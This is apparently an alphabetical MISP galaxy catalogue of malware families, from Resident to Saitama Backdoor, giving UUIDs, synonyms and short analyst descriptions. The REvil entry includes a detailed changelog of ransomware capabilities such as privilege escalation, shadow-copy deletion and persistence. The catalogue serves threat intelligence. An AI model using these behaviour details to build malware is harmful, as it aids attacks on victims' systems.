According to Cisco Talos, Resident is a backdoor likely developed by the same author as win.warmcookie, and it was observed being delivered in intrusions they attribute to TA866.

Internal MISP references

UUID 91435d91-0985-483b-bffb-9762b9cb0287 which can be used as unique global reference for Resident in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Retadup

Internal MISP references

UUID 42fa55e3-e708-4c11-b807-f31573639941 which can be used as unique global reference for Retadup in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Retefe (Windows)

Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Retefe (Windows).

Known Synonyms
`Tsukuba`
`Werdlod`

Internal MISP references

UUID 96bf1b6d-28e1-4dd9-aabe-23050138bc39 which can be used as unique global reference for Retefe (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Retro

Internal MISP references

UUID a4dc538e-09b7-4dba-99b0-e8b8b70dd42a which can be used as unique global reference for Retro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Revenant

According to its author, Revenant is a 3rd party agent for Havoc written in C, and based on Talon. This implant is meant to expand on the Talon implant by implementing covert methods of execution, robust capabilities, and more customization.

Internal MISP references

UUID c95db5a7-8405-4931-868f-1a33ea7e8f6b which can be used as unique global reference for Revenant in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Revenge RAT

According to Cofense, Revenge RAT is a simple and freely available Remote Access Trojan that automatically gathers system information before allowing threat actors to remotely access system components such as webcams, microphones, and various other utilities.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Revenge RAT.

Known Synonyms
`Revetrat`

Internal MISP references

UUID 75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f which can be used as unique global reference for Revenge RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ReverseRAT

Internal MISP references

UUID c3b6a9f9-afef-4249-ab59-afc5b2efc0b3 which can be used as unique global reference for ReverseRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Reveton

Ransomware.

Internal MISP references

UUID 48c10822-9af8-4324-9516-b33ecf975590 which can be used as unique global reference for Reveton in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

REvil (Windows)

REvil Beta MD5: bed6fc04aeb785815744706239a1f243 SHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bf SHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45 * Privilege escalation via CVE-2018-8453 (64-bit only) * Rerun with RunAs to elevate privileges * Implements a requirement that if "exp" is set, privilege escalation must be successful for full execution to occur * Implements target whitelisting using GetKetboardLayoutList * Contains debug console logging functionality * Defines the REvil registry root key as SOFTWARE!test * Includes two variable placeholders in the ransom note: UID & KEY * Terminates processes specified in the "prc" configuration key prior to encryption * Deletes shadow copies and disables recovery * Wipes contents of folders specified in the "wfld" configuration key prior to encryption * Encrypts all non-whitelisted files on fixed drives * Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe * Partially implements a background image setting to display a basic "Image text" message * Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)

REvil 1.00 MD5: 65aa793c000762174b2f86077bdafaea SHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457 SHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc * Adds 32-bit implementation of CVE-2018-8453 exploit * Removes console debug logging * Changes the REvil registry root key to SOFTWARE\recfg * Removes the System/Impersonation success requirement for encrypting network mapped drives * Adds a "wipe" key to the configuration for optional folder wiping * Fully implements the background image setting and leverages values defined in the "img" configuration key * Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT * Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL * Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data

REvil 1.01 MD5: 2abff29b4d87f30f011874b6e98959e9 SHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732c SHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb * Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level * Makes encryption of network mapped drives optional by adding the "-nolan" argument

REvil 1.02 MD5: 4af953b20f3a1f165e7cf31d6156c035 SHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299 SHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4 * Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage * Partially implements "lock file" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. There is no evidence that a lock file is dropped to disk.) * Enhances folder whitelisting logic that take special considerations if the folder is associated with "program files" directories * Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories * Hard-codes whitelisting of "sql" subfolders within program files * Encrypts program files sub-folders that does not contain "sql" in the path * Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted * Encodes stored strings used for URI building within the binary and decodes them in memory right before use * Introduces a REvil registry root key "sub_key" registry value containing the attacker's public key

REvil 1.03 MD5: 3cae02306a95564b1fff4ea45a7dfc00 SHA1: 0ce2cae5287a64138d273007b34933362901783d SHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf * Removes lock file logic that was partially implemented in 1.02 * Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.) * Encodes stored shellcode * Adds the -path argument: * Does not wipe folders (even if wipe == true) * Does not set desktop background * Does not contact the C2 server (even if net == true) * Encrypts files in the specified folder and drops the ransom note * Changes the REvil registry root key to SOFTWARE\QtProject\OrganizationDefaults * Changes registry key values from --> to: * sub_key --> pvg * pk_key --> sxsP * sk_key --> BDDC8 * 0_key --> f7gVD7 * rnd_ext --> Xu7Nnkd * stat --> sMMnxpgk

REvil 1.04 MD5: 6e3efb83299d800edf1624ecbc0665e7 SHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d SHA256: 2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6 * Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.) * Removes the folder wipe capability * Changes the REvil registry root key to SOFTWARE\GitForWindows * Changes registry key values from --> to: * pvg --> QPM * sxsP --> cMtS * BDDC8 --> WGg7j * f7gVD7 --> zbhs8h * Xu7Nnkd --> H85TP10 * sMMnxpgk --> GCZg2PXD

REvil v1.05 MD5: cfefcc2edc5c54c74b76e7d1d29e69b2 SHA1: 7423c57db390def08154b77e2b5e043d92d320c7 SHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea * Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence. * Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' : * SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lNOWZyAWVv * Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done. * Changes registry key values from --> to: * QPM --> tgE * cMtS --> 8K09 * WGg7j --> xMtNc * zbhs8h --> CTgE4a * H85TP10 --> oE5bZg0 * GCZg2PXD --> DC408Qp4

REvil v1.06 MD5: 65ff37973426c09b9ff95f354e62959e SHA1: b53bc09cfbd292af7b3609734a99d101bd24d77e SHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e * Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us. * Modified handling of network file encryption. Now explicitly passes every possible "Scope" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers. * Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R' * Changes registry key values from --> to: * tgE --> 73g * 8K09 --> vTGj * xMtNc --> Q7PZe * CTgE4a --> BuCrIp * oE5bZg0 --> lcZd7OY * DC408Qp4 --> sLF86MWC

REvil v1.07 MD5: ea4cae3d6d8150215a4d90593a4c30f2 SHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e SHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3 TBD

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular REvil (Windows).

Known Synonyms
`Sodin`
`Sodinokibi`

Internal MISP references

UUID e7698597-e0a9-4f4b-9920-09f5db225bd4 which can be used as unique global reference for REvil (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RGDoor

Internal MISP references

UUID daddd1dc-c415-4970-89ee-526ee8de2ec1 which can be used as unique global reference for RGDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rhadamanthys

According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.

At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.

Internal MISP references

UUID 50d322d7-c7e0-4d9b-9996-e5767caa8f1c which can be used as unique global reference for Rhadamanthys in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rhino

Ransomware.

Internal MISP references

UUID cff6ec82-9d14-4307-9b5b-c0bd17e62f2a which can be used as unique global reference for Rhino in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RHttpCtrl

Internal MISP references

UUID 5f1bac43-6506-43f0-b5d6-709a39abd671 which can be used as unique global reference for RHttpCtrl in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rhysida (Windows)

Internal MISP references

UUID a7d77891-afc2-4be6-b831-a3b2253fb195 which can be used as unique global reference for Rhysida (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rietspoof

Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.

Internal MISP references

UUID ec67123a-c3bc-4f46-b9f3-569c19e224ca which can be used as unique global reference for Rietspoof in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rifdoor

Internal MISP references

UUID 2639b71e-1bf1-4cd2-8fa2-9498e893ef3f which can be used as unique global reference for Rifdoor in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor - webarchive
https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
https://mega.nz/file/lkh1gY5C#93FUlwTwl0y27cfM0jtm4SYnWbtk06d0qoDg1e4eQ6s - webarchive
http://www.issuemakerslab.com/research3/ - webarchive
https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/ - webarchive

Associated metadata

Metadata key	Value
type	[]

Rikamanu

Internal MISP references

UUID 6703e8ce-2c5e-4a9d-96b4-49e90074b043 which can be used as unique global reference for Rikamanu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rincux

Internal MISP references

UUID 383021b9-fcf9-4c21-a0e2-d75fb8c0727a which can be used as unique global reference for Rincux in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ripper ATM

Internal MISP references

UUID a85b0619-ed8e-4324-8603-af211d682dac which can be used as unique global reference for Ripper ATM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RisePro

RisePro is a stealer that is spread through downloaders like win.privateloader. Once executed on a system, the malware can steal credit card information, passwords, and personal data.

Internal MISP references

UUID 20ba0ede-454c-461d-a0e1-c053a838faa2 which can be used as unique global reference for RisePro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rising Sun

Internal MISP references

UUID 148a7078-3a38-4974-8990-9d5881f8267b which can be used as unique global reference for Rising Sun in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RM3

Created from the codebase of Gozi/ISFB.

Internal MISP references

UUID dec5b601-16b5-439a-8b2a-4ebc7ec31de5 which can be used as unique global reference for RM3 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RMS

CyberInt states that Remote Manipulator System (RMS) is a legitimate tool developed by Russian organization TektonIT and has been observed in campaigns conducted by TA505 as well as numerous smaller campaigns likely attributable to other, disparate, threat actors. In addition to the availability of commercial licenses, the tool is free for non-commercial use and supports the remote administration of both Microsoft Windows and Android devices.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RMS.

Known Synonyms
`Gussdoor`
`Remote Manipulator System`
`RuRAT`

Internal MISP references

UUID 94339b04-9332-4691-b820-5021368f1d3a which can be used as unique global reference for RMS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ROADSWEEP

Internal MISP references

UUID 4dee0861-e19d-42ee-a68e-c08c39146407 which can be used as unique global reference for ROADSWEEP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RoarBAT

According to SOCRadar, this is a batch script that uses WinRAR to delete files with target file extensions from a disk.

Internal MISP references

UUID 7ef66505-9b5b-4a80-af64-b51dc7a006ba which can be used as unique global reference for RoarBAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RobinHood

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RobinHood.

Known Synonyms
`RobbinHood`

Internal MISP references

UUID 6f3469f6-7a56-4ba3-a340-f10746390226 which can be used as unique global reference for RobinHood in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

rock

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular rock.

Known Synonyms
`yellowalbatross`

Internal MISP references

UUID 95a26977-295f-4843-ad11-a3d9dcb6c192 which can be used as unique global reference for rock in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.rock - webarchive

Associated metadata

Metadata key	Value
type	[]

Rockloader

Internal MISP references

UUID 1482ffff-47a8-46da-8f47-d363c9d86c0e which can be used as unique global reference for Rockloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rofin

Internal MISP references

UUID bd7b1628-2aeb-44c5-91e7-f02c011034cf which can be used as unique global reference for Rofin in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin - webarchive

Associated metadata

Metadata key	Value
type	[]

RogueRobinNET

A .NET variant of ps1.roguerobin

Internal MISP references

UUID 25b08d2e-f803-4520-9518-4d95ce9f6ed4 which can be used as unique global reference for RogueRobinNET in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rokku

Internal MISP references

UUID 38f57823-ccc2-424b-8140-8ba30325af9c which can be used as unique global reference for Rokku in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RokRAT

It is a backdoor commonly distributed as an encoded binary file downloaded and decrypted by shellcode following the exploitation of weaponized documents. DOGCALL is capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual machine detections, and leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RokRAT.

Known Synonyms
`DOGCALL`

Internal MISP references

UUID 16dcc67b-4415-4620-818d-7ca24a5ccaf5 which can be used as unique global reference for RokRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ROLLCOAST

ROLLCOAST is a ransomware program that encrypts files on logical drives attached to a system. ROLLCOAST is a Dynamic Linked Library (DLL) with no named exports. When observed by Mandiant it uniquely had only one ordinal export 0x01. This suggested the sample was designed to avoid detection and be invoked within memory, possibly through BEACON provided to affiliates. Incident responders working on similar intrusions should capture memory for analysis.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ROLLCOAST.

Known Synonyms
`Arcane`
`S4bb47h`
`Sabbath`

Internal MISP references

UUID a3178bd5-719b-4065-9a55-d13bb34e5c14 which can be used as unique global reference for ROLLCOAST in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RollSling

Internal MISP references

UUID 40a0d770-21bd-4561-aba0-bfe000bc18b0 which can be used as unique global reference for RollSling in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rombertik

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rombertik.

Known Synonyms
`CarbonGrabber`

Internal MISP references

UUID ab5066b4-d5ff-4f83-9a05-6e74c043a6e1 which can be used as unique global reference for Rombertik in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ROMCOM RAT

Unit 42 observed threat actor Tropical Scorpius using this RAT in operations where also Cuba ransomware was deployed.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ROMCOM RAT.

Known Synonyms
`PEAPOD`
`SingleCamper`
`SnipBot`

Internal MISP references

UUID 5f1c11d3-c6ac-4368-a801-cced88a9d93b which can be used as unique global reference for ROMCOM RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Romeo(Alfa,Bravo, ...)

Internal MISP references

UUID 87a45a07-30d7-4223-ae61-6b1e6dde0f5a which can be used as unique global reference for Romeo(Alfa,Bravo, ...) in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos - webarchive

Associated metadata

Metadata key	Value
type	[]

Rook

According to PCrisk, Rook is ransomware (an updated variant of Babuk) that prevents victims from accessing/opening files by encrypting them. It also modifies filenames and creates a text file/ransom note ("HowToRestoreYourFiles.txt"). Rook renames files by appending the ".Rook" extension. For example, it renames "1.jpg" to "1.jpg.Rook", "2.jpg" to "2.jpg.Rook".

Internal MISP references

UUID 5df87e9b-4fd1-4f48-92d7-416b7d83313f which can be used as unique global reference for Rook in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Roopirs

Internal MISP references

UUID b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9 which can be used as unique global reference for Roopirs in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs - webarchive

Associated metadata

Metadata key	Value
type	[]

Roopy

Internal MISP references

UUID 68050d50-eece-43ba-8668-0825eab940f0 which can be used as unique global reference for Roopy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rorschach Ransomware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rorschach Ransomware.

Known Synonyms
`BabLock`

Internal MISP references

UUID 86c3434c-ca86-4109-b0fc-61d14d59505c which can be used as unique global reference for Rorschach Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Roseam

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Roseam.

Known Synonyms
`PisLoader`

Internal MISP references

UUID 8a4eb0ca-7175-4e69-b8d2-fd7a724de67b which can be used as unique global reference for Roseam in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Roshtyak

A DLL backdoor distributed by Raspberry Robin. According to Avast Decoded, Roshtyak belongs to one of the best-protected malware strains they have ever seen.

Internal MISP references

UUID 398316b7-3ccd-445e-ab10-4428f165649f which can be used as unique global reference for Roshtyak in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RotorCrypt

Ransomware that was discovered over the last months of 2016 and likely based on Gomasom, another ransomware family.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RotorCrypt.

Known Synonyms
`RotoCrypt`
`Rotor`

Internal MISP references

UUID f20ef9a8-6ffc-4ef2-98ba-44f6b2eab966 which can be used as unique global reference for RotorCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rover

Internal MISP references

UUID 53e94bc9-c8d2-4fb6-9c02-00841e454050 which can be used as unique global reference for Rover in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rovnix

Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rovnix.

Known Synonyms
`BkLoader`
`Cidox`
`Mayachok`

Internal MISP references

UUID 8d984309-b7fa-4ccf-a6b7-da17283aae2f which can be used as unique global reference for Rovnix in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RoyalCli

RoyalCli is a backdoor which appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary. RoyalCli and BS2005 both communicate with the attacker's command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2.

Internal MISP references

UUID 92d87656-5e5b-410c-bdb6-bf028324dc72 which can be used as unique global reference for RoyalCli in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Royal DNS

RoyalDNS is a DNS based backdoor used by APT15 that persistences on a system through a service called 'Nwsapagent'.

Internal MISP references

UUID 8611f656-b0d8-4d16-93f0-c699f2af9b7a which can be used as unique global reference for Royal DNS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Royal Ransom (Windows)

Ransomware

Internal MISP references

UUID df1baad8-e4b6-4507-964c-6e9a8dd5252c which can be used as unique global reference for Royal Ransom (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rozena

Internal MISP references

UUID cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766 which can be used as unique global reference for Rozena in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RTM

RTM Banker also known as Redaman was first blogged about in February 2017 by ESET. The malware is written in Delphi and shows some similarities (like process list) with Buhtrap. It uses a slightly modified version of RC4 to encrypt its strings, network data, configuration and modules, according to ESET.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RTM.

Known Synonyms
`Redaman`

Internal MISP references

UUID e6952b4d-e96d-4641-a88f-60074776d553 which can be used as unique global reference for RTM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RTM Locker

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RTM Locker.

Known Synonyms
`Read The Manual Locker`

Internal MISP references

UUID b299d033-7772-44a6-a8e0-6b8c5f8af5c6 which can be used as unique global reference for RTM Locker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

rtpos

Internal MISP references

UUID 89ee2cb0-2c72-4a25-825b-bb56083fdd9b which can be used as unique global reference for rtpos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ruckguv

Internal MISP references

UUID b88b50c0-3db9-4b8f-8564-4f56f991bee2 which can be used as unique global reference for Ruckguv in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rumish

Internal MISP references

UUID e1564cfe-ab82-4c14-8f92-65af0d760d70 which can be used as unique global reference for Rumish in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish - webarchive

Associated metadata

Metadata key	Value
type	[]

Running RAT

NJCCIC characterizes RunningRAT as a remote access trojan (RAT) that operates using two DLL files. When the trojan is loaded onto a system, it executes the first DLL. This is used to disable anti-malware solutions, unpack and execute the main RAT DLL, and gain persistence. The trojan installs a Windows batch file dx.bat that attempts to kill the daumcleaner.exe task, a Korean security program. The file then attempts to remove itself. Once the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server to change the address the trojan communicates with. The second DLL gathers information about the victim's system, including its operating system and driver and processor information. The RAT can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more. The second DLL also uses several anti-bugging techniques.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Running RAT.

Known Synonyms
`running_rat`

Internal MISP references

UUID b746a645-5974-44db-a811-a024214b7fba which can be used as unique global reference for Running RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RURansom

RURansom shows characteristics of typical ransomware, but despite its name, TrendMicro's assumptions after analysis showed that this malware is more a wiper than ransomware, because the irreversible destruction of encrypted files.

Internal MISP references

UUID bdcfb449-e897-4c44-a429-7665cce194fe which can be used as unique global reference for RURansom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rurktar

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rurktar.

Known Synonyms
`RCSU`

Internal MISP references

UUID 512e0b13-a52b-45ef-9230-7172f5e976d4 which can be used as unique global reference for Rurktar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RustBucket (Windows)

Internal MISP references

UUID 832680ff-8b29-492e-8523-62510eb5d021 which can be used as unique global reference for RustBucket (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Rustock

Internal MISP references

UUID 76e98e04-0ab7-4000-80ee-7bcbcf9c110d which can be used as unique global reference for Rustock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ryuk

Ryuk is a ransomware which encrypts its victim's files and asks for a ransom via bitcoin to release the original files. It is has been observed being used to attack companies or professional environments. Cybersecurity experts figured out that Ryuk and Hermes ransomware shares pieces of codes. Hermes is commodity ransomware that has been observed for sale on dark-net forums and used by multiple threat actors.

Internal MISP references

UUID 62c79940-184e-4b8d-9237-35434bb79678 which can be used as unique global reference for Ryuk in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ryuk Stealer

Information Stealer that searches for sensitive documents and uploads its results to an FTP server. Skips files with known Ryuk extensions.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ryuk Stealer.

Known Synonyms
`Sidoh`

Internal MISP references

UUID 0f0e5355-1dbf-4af4-aebf-88b08e6272a4 which can be used as unique global reference for Ryuk Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sadogo

Ransomware.

Internal MISP references

UUID 188528f1-1292-4aaa-b1e6-3fe0ab78ff81 which can be used as unique global reference for Sadogo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Saefko

Internal MISP references

UUID 60124475-1c52-4108-81cf-7b9fa0f0d3bb which can be used as unique global reference for Saefko in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SafeNet

Internal MISP references

UUID d16f9dc6-290d-4174-8b47-a972cc52dac7 which can be used as unique global reference for SafeNet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sagerunex

According to Symantec, Sagerunex is a backdoor that is fairly resilient and implements multiple forms of communication with its command-and-control (C&C) server. Its logs are encrypted and the encryption algorithm used is AES256-CBC with 8192 rounds of SHA256 for key derivation based on a hardcoded key. It supports multiple modes methods for communicating via HTTP (proxy-aware).

Internal MISP references

UUID d8228309-ebf8-46fd-a968-bd9e24c498b4 which can be used as unique global reference for Sagerunex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SAGE

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SAGE.

Known Synonyms
`Saga`

Internal MISP references

UUID 56db8a46-a71b-4de1-a6b8-4312f78b8431 which can be used as unique global reference for SAGE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SaiGon

FireEye reports SaiGon as a variant of ISFB v3 (versions documented are tagged 3.50.132) that is more a generic backdoor than being focused on enabling banking fraud.

Internal MISP references

UUID 08817c1e-3a90-4c9b-b332-52ebe72669c5 which can be used as unique global reference for SaiGon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Saint Bot

Internal MISP references

UUID aa0afca8-551e-4fc7-a314-f541b80c6833 which can be used as unique global reference for Saint Bot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Saitama Backdoor

This in .Net witten backdoor abuses the DNS protocoll for its C2 communication. Also other techniques (e.g. long random sleeps, compression) are used to become more stealthy.

Synonyms

